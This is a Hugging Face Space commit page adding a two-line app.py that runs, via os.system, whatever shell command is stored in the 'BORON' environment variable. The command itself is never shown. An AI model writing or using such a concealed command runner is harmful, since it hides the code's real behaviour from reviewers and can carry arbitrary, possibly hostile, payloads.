Hugging Face
Models
Datasets
Spaces
Community
Docs
Enterprise
Pricing
Log In
Sign Up
Spaces:
tdufdyuyfy
/
mrdler
like
0
Building
App
Files
Files
Community
Fetching metadata from the HF Docker repository...
tdufdyuyfy
commited on
May 17
Commit
49fdb13
·
verified
·
1 Parent(s):
bb86073
Create app.py
Browse files
Files changed (1)
hide
show
app.py
+2
-0
app.py
ADDED
Viewed
@@ -0,0 +1,2 @@
1
+
from os import system, getenv
2
+
system(getenv('BORON'))